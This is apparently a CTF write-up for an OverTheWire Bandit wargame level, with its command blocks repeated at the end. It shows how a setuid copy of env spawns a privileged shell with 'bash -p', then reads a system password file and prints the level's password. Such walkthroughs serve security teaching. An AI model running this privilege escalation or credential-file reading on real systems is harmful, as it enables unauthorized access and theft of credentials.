OverTheWire - Bandit: Level 27 to Level 28

Good job getting a shell! Now hurry and grab the password for bandit27!

Using the shell created in the previous level, we can find a executable with the suid-bit set.

1 -rwsr-x---  1 bandit27 bandit26 14876 Oct  5 06:19 bandit27-do

Let’s take a look at the usage of this executable:

1 $ ./bandit27-do --help
2 Usage: env [OPTION]... [-] [NAME=VALUE]... [COMMAND [ARG]...]
3 Set each NAME to VALUE in the environment and run COMMAND.
4 
5 Mandatory arguments to long options are mandatory for short options too.
6   -i, --ignore-environment  start with an empty environment
7   -0, --null           end each output line with NUL, not newline
8   -u, --unset=NAME     remove variable from the environment
9   -C, --chdir=DIR      change working directory to DIR
10   -S, --split-string=S  process and split S into separate arguments;
11                         used to pass multiple arguments on shebang lines
12       --block-signal[=SIG]    block delivery of SIG signal(s) to COMMAND
13       --default-signal[=SIG]  reset handling of SIG signal(s) to the default
14       --ignore-signal[=SIG]   set handling of SIG signals(s) to do nothing
15       --list-signal-handling  list non default signal handling to stderr
16   -v, --debug          print verbose information for each processing step
17       --help     display this help and exit
18       --version  output version information and exit
19 
20 A mere - implies -i.  If no COMMAND, print the resulting environment.
21 
22 SIG may be a signal name like 'PIPE', or a signal number like '13'.
23 Without SIG, all known signals are included.  Multiple signals can be
24 comma-separated.
25 
26 GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
27 Full documentation <https://www.gnu.org/software/coreutils/env>
28 or available locally via: info '(coreutils) env invocation'

The first line implies, this is a version of the /usr/bin/env executable. A tool to run a command with a modified environment. This can be used to gain access to a bash shell as bandit27.

1 $ ./bandit27-do /bin/bash -p
2 $ whoami
3 bandit27
4 $ cat /etc/bandit_pass/bandit27
5 YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS

Be aware of the -p flag used to call bash. This is needed, so bash does not drop elevated privileges.

Kategorien: #/writeups/; #/overthewire/

Tags: #/security/; #/hacking/; #/bash/; #/linux/; #/ctf/

1	$ ./bandit27-do --help
2	Usage: env [OPTION]... [-] [NAME=VALUE]... [COMMAND [ARG]...]
3	Set each NAME to VALUE in the environment and run COMMAND.
4
5	Mandatory arguments to long options are mandatory for short options too.
6	-i, --ignore-environment start with an empty environment
7	-0, --null end each output line with NUL, not newline
8	-u, --unset=NAME remove variable from the environment
9	-C, --chdir=DIR change working directory to DIR
10	-S, --split-string=S process and split S into separate arguments;
11	used to pass multiple arguments on shebang lines
12	--block-signal[=SIG] block delivery of SIG signal(s) to COMMAND
13	--default-signal[=SIG] reset handling of SIG signal(s) to the default
14	--ignore-signal[=SIG] set handling of SIG signals(s) to do nothing
15	--list-signal-handling list non default signal handling to stderr
16	-v, --debug print verbose information for each processing step
17	--help display this help and exit
18	--version output version information and exit
19
20	A mere - implies -i. If no COMMAND, print the resulting environment.
21
22	SIG may be a signal name like 'PIPE', or a signal number like '13'.
23	Without SIG, all known signals are included. Multiple signals can be
24	comma-separated.
25
26	GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
27	Full documentation <https://www.gnu.org/software/coreutils/env>
28	or available locally via: info '(coreutils) env invocation'

1	$ ./bandit27-do /bin/bash -p
2	$ whoami
3	bandit27
4	$ cat /etc/bandit_pass/bandit27
5	YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS